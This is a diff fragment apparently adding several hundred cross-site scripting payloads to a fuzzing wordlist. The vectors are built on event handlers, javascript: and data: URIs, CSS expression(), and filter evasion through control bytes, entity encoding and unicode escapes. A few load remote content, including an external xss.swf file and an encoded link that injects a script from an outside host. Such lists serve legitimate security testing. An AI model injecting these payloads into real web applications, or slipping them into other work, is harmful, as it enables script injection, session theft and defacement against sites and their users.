ewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
1380
+ <svg><script ?>alert(1)
1381
+ <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
1382
+ <img src=`xx:xx`onerror=alert(1)>
1383
+ <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
1384
+ <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
1385
+ <math><a xlink:href="//jsfiddle.net/t846h/">click
1386
+ <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
1387
+ <svg contentScriptType=text/vbs><script>MsgBox+1
1388
+ <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
1389
+ <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
1390
+ <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
1391
+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
1392
+ <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
1393
+ <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
1394
+ <script>+-+-1-+-+alert(1)</script>
1395
+ <body/onload=&lt;!--&gt;&#10alert(1)>
1396
+ <script itworksinallbrowsers>/*<script* */alert(1)</script
1397
+ <img src ?itworksonchrome?\/onerror = alert(1)
1398
+ <svg><script>//&NewLine;confirm(1);</script </svg>
1399
+ <svg><script onlypossibleinopera:-)> alert(1)
1400
+ <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
1401
+ <script x> alert(1) </script 1=2
1402
+ <div/onmouseover='alert(1)'> style="x:">
1403
+ <--`<img/src=` onerror=alert(1)> --!>
1404
+ <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
1405
+ <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
1406
+ "><img src=x onerror=window.open('https://www.google.com/');>
1407
+ <form><button formaction=javascript&colon;alert(1)>CLICKME
1408
+ <math><a xlink:href="//jsfiddle.net/t846h/">click
1409
+ <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
1410
+ <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
1411
+ <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
1412
+ <script\x20type="text/javascript">javascript:alert(1);</script>
1413
+ <script\x3Etype="text/javascript">javascript:alert(1);</script>
1414
+ <script\x0Dtype="text/javascript">javascript:alert(1);</script>
1415
+ <script\x09type="text/javascript">javascript:alert(1);</script>
1416
+ <script\x0Ctype="text/javascript">javascript:alert(1);</script>
1417
+ <script\x2Ftype="text/javascript">javascript:alert(1);</script>
1418
+ <script\x0Atype="text/javascript">javascript:alert(1);</script>
1419
+ '`"><\x3Cscript>javascript:alert(1)</script>
1420
+ '`"><\x00script>javascript:alert(1)</script>
1421
+ <img src=1 href=1 onerror="javascript:alert(1)"></img>
1422
+ <audio src=1 href=1 onerror="javascript:alert(1)"></audio>
1423
+ <video src=1 href=1 onerror="javascript:alert(1)"></video>
1424
+ <body src=1 href=1 onerror="javascript:alert(1)"></body>
1425
+ <image src=1 href=1 onerror="javascript:alert(1)"></image>
1426
+ <object src=1 href=1 onerror="javascript:alert(1)"></object>
1427
+ <script src=1 href=1 onerror="javascript:alert(1)"></script>
1428
+ <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
1429
+ <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
1430
+ <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
1431
+ <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
1432
+ <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
1433
+ <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
1434
+ <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
1435
+ <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
1436
+ <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
1437
+ <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
1438
+ <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
1439
+ <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
1440
+ <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
1441
+ <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
1442
+ <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
1443
+ <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
1444
+ <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
1445
+ <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
1446
+ <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
1447
+ <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
1448
+ <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
1449
+ <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
1450
+ <applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
1451
+ <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
1452
+ <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
1453
+ <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
1454
+ <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
1455
+ <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
1456
+ <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
1457
+ <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
1458
+ <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
1459
+ <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
1460
+ <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
1461
+ <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
1462
+ <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
1463
+ <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
1464
+ <body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
1465
+ <object onError object onError="javascript:javascript:alert(1)"></object onError>
1466
+ <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
1467
+ <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
1468
+ <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
1469
+ <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
1470
+ <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
1471
+ <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
1472
+ <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
1473
+ <body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
1474
+ <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
1475
+ <body onload body onload="javascript:javascript:alert(1)"></body onload>
1476
+ <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
1477
+ <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
1478
+ <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
1479
+ <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
1480
+ <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
1481
+ <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
1482
+ <iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
1483
+ <svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
1484
+ <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
1485
+ <body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
1486
+ \x3Cscript>javascript:alert(1)</script>
1487
+ '"`><script>/* *\x2Fjavascript:alert(1)// */</script>
1488
+ <script>javascript:alert(1)</script\x0D
1489
+ <script>javascript:alert(1)</script\x0A
1490
+ <script>javascript:alert(1)</script\x0B
1491
+ <script charset="\x22>javascript:alert(1)</script>
1492
+ <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
1493
+ --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
1494
+ --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
1495
+ --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
1496
+ --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
1497
+ `"'><img src='#\x27 onerror=javascript:alert(1)>
1498
+ <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
1499
+ "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
1500
+ <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
1501
+ <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
1502
+ <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
1503
+ <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
1504
+ <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
1505
+ <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
1506
+ <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
1507
+ <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
1508
+ <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
1509
+ <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
1510
+ <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
1511
+ <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
1512
+ <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
1513
+ <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
1514
+ <script>/* *\x2A/javascript:alert(1)// */</script>
1515
+ <script>/* *\x00/javascript:alert(1)// */</script>
1516
+ <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
1517
+ <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
1518
+ <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
1519
+ <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
1520
+ <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
1521
+ "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
1522
+ "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
1523
+ <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
1524
+ <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
1525
+ <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
1526
+ '`"><\x3Cscript>javascript:alert(1)</script>
1527
+ '`"><\x00script>javascript:alert(1)</script>
1528
+ "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
1529
+ "'`><\x00img src=xxx:x onerror=javascript:alert(1)>
1530
+ <script src="data:text/plain\x2Cjavascript:alert(1)"></script>
1531
+ <script src="data:\xD4\x8F,javascript:alert(1)"></script>
1532
+ <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
1533
+ <script src="data:\xCB\x8F,javascript:alert(1)"></script>
1534
+ <script\x20type="text/javascript">javascript:alert(1);</script>
1535
+ <script\x3Etype="text/javascript">javascript:alert(1);</script>
1536
+ <script\x0Dtype="text/javascript">javascript:alert(1);</script>
1537
+ <script\x09type="text/javascript">javascript:alert(1);</script>
1538
+ <script\x0Ctype="text/javascript">javascript:alert(1);</script>
1539
+ <script\x2Ftype="text/javascript">javascript:alert(1);</script>
1540
+ <script\x0Atype="text/javascript">javascript:alert(1);</script>
1541
+ ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
1542
+ ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
1543
+ ABC<div style="x:expression\x00(javascript:alert(1)">DEF
1544
+ ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
1545
+ ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
1546
+ ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
1547
+ ABC<div style="x:\x09expression(javascript:alert(1)">DEF
1548
+ ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
1549
+ ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
1550
+ ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
1551
+ ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
1552
+ ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
1553
+ ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
1554
+ ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
1555
+ ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
1556
+ ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
1557
+ ABC<div style="x:\x20expression(javascript:alert(1)">DEF
1558
+ ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
1559
+ ABC<div style="x:\x00expression(javascript:alert(1)">DEF
1560
+ ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
1561
+ ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
1562
+ ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
1563
+ ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
1564
+ ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
1565
+ ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
1566
+ ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
1567
+ ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
1568
+ <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1569
+ <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1570
+ <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1571
+ <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1572
+ <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1573
+ <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1574
+ <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1575
+ <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1576
+ <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1577
+ <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1578
+ <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1579
+ <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1580
+ <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1581
+ <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1582
+ <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1583
+ <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1584
+ <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1585
+ <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1586
+ <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1587
+ <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1588
+ <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1589
+ <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1590
+ <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1591
+ <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1592
+ <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1593
+ <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1594
+ <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1595
+ <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1596
+ <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1597
+ <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1598
+ <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1599
+ <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1600
+ <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1601
+ <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1602
+ <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1603
+ <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1604
+ <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1605
+ <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1606
+ <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1607
+ <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1608
+ <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1609
+ <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1610
+ <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1611
+ <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1612
+ <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1613
+ <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1614
+ <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1615
+ <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1616
+ <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
1617
+ <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1618
+ <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1619
+ <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
1620
+ <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
1621
+ <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
1622
+ <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
1623
+ <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
1624
+ <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
1625
+ `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
1626
+ `"'><img src=xxx:x \x22onerror=javascript:alert(1)>
1627
+ `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
1628
+ `"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
1629
+ `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
1630
+ `"'><img src=xxx:x \x09onerror=javascript:alert(1)>
1631
+ `"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
1632
+ `"'><img src=xxx:x \x00onerror=javascript:alert(1)>
1633
+ `"'><img src=xxx:x \x27onerror=javascript:alert(1)>
1634
+ `"'><img src=xxx:x \x20onerror=javascript:alert(1)>
1635
+ "`'><script>\x3Bjavascript:alert(1)</script>
1636
+ "`'><script>\x0Djavascript:alert(1)</script>
1637
+ "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
1638
+ "`'><script>\xE2\x80\x81javascript:alert(1)</script>
1639
+ "`'><script>\xE2\x80\x84javascript:alert(1)</script>
1640
+ "`'><script>\xE3\x80\x80javascript:alert(1)</script>
1641
+ "`'><script>\x09javascript:alert(1)</script>
1642
+ "`'><script>\xE2\x80\x89javascript:alert(1)</script>
1643
+ "`'><script>\xE2\x80\x85javascript:alert(1)</script>
1644
+ "`'><script>\xE2\x80\x88javascript:alert(1)</script>
1645
+ "`'><script>\x00javascript:alert(1)</script>
1646
+ "`'><script>\xE2\x80\xA8javascript:alert(1)</script>
1647
+ "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
1648
+ "`'><script>\xE1\x9A\x80javascript:alert(1)</script>
1649
+ "`'><script>\x0Cjavascript:alert(1)</script>
1650
+ "`'><script>\x2Bjavascript:alert(1)</script>
1651
+ "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
1652
+ "`'><script>-javascript:alert(1)</script>
1653
+ "`'><script>\x0Ajavascript:alert(1)</script>
1654
+ "`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
1655
+ "`'><script>\x7Ejavascript:alert(1)</script>
1656
+ "`'><script>\xE2\x80\x87javascript:alert(1)</script>
1657
+ "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
1658
+ "`'><script>\xE2\x80\xA9javascript:alert(1)</script>
1659
+ "`'><script>\xC2\x85javascript:alert(1)</script>
1660
+ "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
1661
+ "`'><script>\xE2\x80\x83javascript:alert(1)</script>
1662
+ "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
1663
+ "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
1664
+ "`'><script>\xE2\x80\x80javascript:alert(1)</script>
1665
+ "`'><script>\x21javascript:alert(1)</script>
1666
+ "`'><script>\xE2\x80\x82javascript:alert(1)</script>
1667
+ "`'><script>\xE2\x80\x86javascript:alert(1)</script>
1668
+ "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
1669
+ "`'><script>\x0Bjavascript:alert(1)</script>
1670
+ "`'><script>\x20javascript:alert(1)</script>
1671
+ "`'><script>\xC2\xA0javascript:alert(1)</script>
1672
+ "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
1673
+ "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
1674
+ "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
1675
+ "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
1676
+ "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
1677
+ "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
1678
+ "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
1679
+ "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
1680
+ "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
1681
+ <script\x2F>javascript:alert(1)</script>
1682
+ <script\x20>javascript:alert(1)</script>
1683
+ <script\x0D>javascript:alert(1)</script>
1684
+ <script\x0A>javascript:alert(1)</script>
1685
+ <script\x0C>javascript:alert(1)</script>
1686
+ <script\x00>javascript:alert(1)</script>
1687
+ <script\x09>javascript:alert(1)</script>
1688
+ "><img src=x onerror=javascript:alert(1)>
1689
+ "><img src=x onerror=javascript:alert('1')>
1690
+ "><img src=x onerror=javascript:alert("1")>
1691
+ "><img src=x onerror=javascript:alert(`1`)>
1692
+ "><img src=x onerror=javascript:alert(('1'))>
1693
+ "><img src=x onerror=javascript:alert(("1"))>
1694
+ "><img src=x onerror=javascript:alert((`1`))>
1695
+ "><img src=x onerror=javascript:alert(A)>
1696
+ "><img src=x onerror=javascript:alert((A))>
1697
+ "><img src=x onerror=javascript:alert(('A'))>
1698
+ "><img src=x onerror=javascript:alert('A')>
1699
+ "><img src=x onerror=javascript:alert(("A"))>
1700
+ "><img src=x onerror=javascript:alert("A")>
1701
+ "><img src=x onerror=javascript:alert((`A`))>
1702
+ "><img src=x onerror=javascript:alert(`A`)>
1703
+ `"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
1704
+ `"'><img src=xxx:x onerror\x00=javascript:alert(1)>
1705
+ `"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
1706
+ `"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
1707
+ `"'><img src=xxx:x onerror\x20=javascript:alert(1)>
1708
+ `"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
1709
+ `"'><img src=xxx:x onerror\x09=javascript:alert(1)>
1710
+ <script>javascript:alert(1)<\x00/script>
1711
+ <img src=# onerror\x3D"javascript:alert(1)" >
1712
+ <input onfocus=javascript:alert(1) autofocus>
1713
+ <input onblur=javascript:alert(1) autofocus><input autofocus>
1714
+ <video poster=javascript:javascript:alert(1)//
1715
+ <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
1716
+ <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
1717
+ <video><source onerror="javascript:javascript:alert(1)">
1718
+ <video onerror="javascript:javascript:alert(1)"><source>
1719
+ <form><button formaction="javascript:javascript:alert(1)">X
1720
+ <body oninput=javascript:alert(1)><input autofocus>
1721
+ <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
1722
+ <frameset onload=javascript:alert(1)>
1723
+ <table background="javascript:javascript:alert(1)">
1724
+ <!--<img src="--><img src=x onerror=javascript:alert(1)//">
1725
+ <comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
1726
+ <![><img src="]><img src=x onerror=javascript:alert(1)//">
1727
+ <style><img src="</style><img src=x onerror=javascript:alert(1)//">
1728
+ <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
1729
+ <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
1730
+ <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
1731
+ <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
1732
+ <object data="data:text/html;base64,%(base64)s">
1733
+ <embed src="data:text/html;base64,%(base64)s">
1734
+ <b <script>alert(1)</script>0
1735
+ <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
1736
+ <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
1737
+ <embed src="javascript:alert(1)">
1738
+ <img src="javascript:alert(1)">
1739
+ <image src="javascript:alert(1)">
1740
+ <script src="javascript:alert(1)">
1741
+ <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
1742
+ <? foo="><script>javascript:alert(1)</script>">
1743
+ <! foo="><script>javascript:alert(1)</script>">
1744
+ </ foo="><script>javascript:alert(1)</script>">
1745
+ <? foo="><x foo='?><script>javascript:alert(1)</script>'>">
1746
+ <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
1747
+ <% foo><x foo="%><script>javascript:alert(1)</script>">
1748
+ <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
1749
+ <img \x00src=x onerror="alert(1)">
1750
+ <img \x47src=x onerror="javascript:alert(1)">
1751
+ <img \x11src=x onerror="javascript:alert(1)">
1752
+ <img \x12src=x onerror="javascript:alert(1)">
1753
+ <img\x47src=x onerror="javascript:alert(1)">
1754
+ <img\x10src=x onerror="javascript:alert(1)">
1755
+ <img\x13src=x onerror="javascript:alert(1)">
1756
+ <img\x32src=x onerror="javascript:alert(1)">
1757
+ <img\x47src=x onerror="javascript:alert(1)">
1758
